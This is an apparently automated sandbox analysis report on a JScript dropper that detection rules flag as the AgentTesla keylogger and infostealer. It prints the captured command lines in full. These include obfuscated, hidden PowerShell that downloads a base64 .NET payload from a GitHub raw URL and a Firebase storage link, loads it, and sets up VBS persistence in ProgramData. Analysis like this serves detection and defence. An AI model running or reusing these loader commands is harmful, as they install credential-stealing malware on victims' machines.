                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC3912AD8_2_00007FFAAC3912AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0293A6E014_2_0293A6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_02934A8814_2_02934A88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0293D95814_2_0293D958
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_02933E7014_2_02933E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_029341B814_2_029341B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0639230014_2_06392300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0639115014_2_06391150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_06393AB014_2_06393AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_063933C814_2_063933C8
                  Source: scan_374783.jsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3509
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3509Jump to behavior
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@13/6@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dogn2cd.zn2.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAG
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
